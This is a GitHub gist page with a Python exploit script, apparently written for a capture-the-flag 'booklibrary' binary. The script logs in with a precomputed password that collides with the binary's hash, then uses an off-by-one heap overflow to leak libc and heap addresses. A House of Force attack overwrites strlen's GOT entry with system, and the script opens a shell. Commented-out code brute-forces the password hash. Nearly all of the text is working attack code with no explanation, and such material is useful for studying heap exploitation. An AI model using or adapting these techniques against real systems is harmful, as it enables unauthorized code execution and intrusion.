Created
May 31, 2016 09:35
-
-
Save peternguyen93/d1fee230a830cde75ce3b74f4f39e266 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| p = Pwn(elf='./booklibrary') | |
| password = '\xbbDhQ\xb8\xae' | |
| def login(passwd): | |
| p.read_until('$>') | |
| p.sendnum(5) | |
| p.read_until('Enter pass phrase:') | |
| p.sendline(passwd) | |
| p.read_until('You are root now.') | |
| def addBook(title,book_size,book_content): | |
| p.read_until('$>') | |
| p.sendnum(1) | |
| p.read_until('Enter book size:') | |
| p.sendnum(book_size) | |
| p.read_until('Enter book title:') | |
| p.sendline(title) | |
| if book_content != '': | |
| p.read_until('Enter book content:') | |
| p.sendline(book_content) | |
| p.read_until('Protect this book? (y/N)') | |
| p.sendline('N') | |
| def delBook(book_id): | |
| p.read_until('$>') | |
| p.sendnum(2) | |
| p.read_until('Enter book id:') | |
| p.sendnum(book_id) | |
| def readBook(book_id): | |
| p.read_until('$>') | |
| p.sendnum(3) | |
| p.read_until('Enter book id:') | |
| p.sendnum(book_id) | |
| return p.read_until('=========================') | |
| def exploit(**kargs): | |
| global p # use global var | |
| if kargs.has_key('p'): | |
| if kargs['p'].__class__.__name__ == 'Pwn': # is pwn object | |
| p = kargs['p'] | |
| p.connect() | |
| login(password) | |
| # raw_input('Debug>') | |
| stage1 = 'C'*0x100 | |
| stage1+= p.pA(0,0x41) | |
| stage1+= p.p32(0) | |
| stage1+= 'A'*32 | |
| stage1+= p.p32(8) | |
| stage1+= p.pack(p.got['puts']) | |
| addBook('book1',0x100,'A'*100) | |
| addBook('book2',0x140,'B'*0x130) | |
| delBook(1) | |
| addBook('A'*32,0x1b0,stage1) # off byte one | |
| leak = readBook(2) | |
| puts = p.unpack(leak[49:49 + 6].ljust(8,'\x00')) | |
| system = puts - p.get_libc_offset(puts,'puts') | |
| print 'puts():',hex(puts) | |
| print 'system():',hex(system) | |
| delBook(1) | |
| addBook('A'*32,0x1b0,stage1[:-8] + p.pack(0x0602100)) # off byte one => leak heap | |
| leak = readBook(2) | |
| heap_addr = p.unpack(leak[49:49 + 4].strip('\n').ljust(8,'\x00')) - 0x240 | |
| print 'Heap:',hex(heap_addr) | |
| addBook('book3',0x140,'D'*0x130) | |
| addBook('book4',0x140,'F'*0x130) | |
| addBook('book5',0x100,'F'*0xfa) | |
| delBook(5) | |
| # house of force | |
| stage2 = 'C'*0x100 | |
| stage2+= p.pA(0,0xffffffffffffffff) # overwrite top_chunk_size | |
| addBook('A'*32,0x1f0,stage2) | |
| ptr_top = heap_addr + 0x17e8 | |
| evil_size = 0x602000 - 0x10 - ptr_top | |
| # print evil_size | |
| addBook('evil_book',evil_size,'') | |
| delBook(4) # make sure book->content point to strlen@got | |
| addBook('pwn',1024,p.pack(system) + 'D'*6) # overwrite strlen | |
| # login now become shell | |
| p.read_until('$>') | |
| p.sendnum(5) | |
| p.read_until('Enter pass phrase:') | |
| p.sendline('/bin/sh') | |
| p.io() | |
| exploit() | |
| # def hashpass(passwd): | |
| # _init_state = 0x1505 | |
| # for i in xrange(len(passwd)): | |
| # _init_state = c_uint32((_init_state * 33) ^ ord(passwd[i])).value | |
| # return _init_state | |
| # def collision(hashcode): | |
| # if hashcode <= 0x1505: | |
| # return | |
| # case = set() | |
| # for i in xrange(1,256): | |
| # t = c_uint32((hashcode ^ i) >> 5).value | |
| # case.add(t) | |
| # while len(case): | |
| # t = case.pop() | |
| # collision(t) | |
| # import sys | |
| # passwd = '' | |
| # isfound = False | |
| # for j in xrange(1,255): | |
| # # for k in xrange(1,256): | |
| # # m = '\xbbDh' + chr(j) + chr(k) + 'I' | |
| # m = '\xbbDhQ\xb8' + chr(j) | |
| # h = hashpass(m) | |
| # print repr(m),hex(h) | |
| # # if (h >> 8) == 0xc810ee: | |
| # if h == 0xC810EEB5: | |
| # print 'Found',repr(m),hex(h) | |
| # passwd = m | |
| # isfound = True | |
| # break | |
| # # if isfound: | |
| # # break | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment